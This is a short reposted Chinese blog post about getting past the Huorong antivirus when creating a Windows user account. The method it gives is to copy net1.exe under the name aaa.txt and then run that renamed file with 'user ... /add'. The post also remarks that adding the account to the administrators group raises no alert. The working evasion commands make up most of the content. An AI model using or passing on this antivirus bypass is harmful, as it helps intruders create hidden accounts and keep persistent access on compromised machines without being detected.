A-A+

添加用户(过火绒)

2021年03月11日 文章转载 暂无评论 阅读 686 views 次
源自于某安全实验室发文,文章出来一小时内就被删啦,大致内容如下

正常添加net和net1拦截如下

文章其实实际就是火绒加用户的绕过方式,也并非火绒存在漏洞,火绒官方都发文了!添加用户最终效果如下
copy c:\windows\system32\net1.exe  aaa.txt
aaa.txt user y11 [email protected]@@ /add

其实也就只检测了加用户,加管理是不会有告警的

原文链接:https://www.cnblogs.com/Yang34/p/14488100.html
标签:

给我留言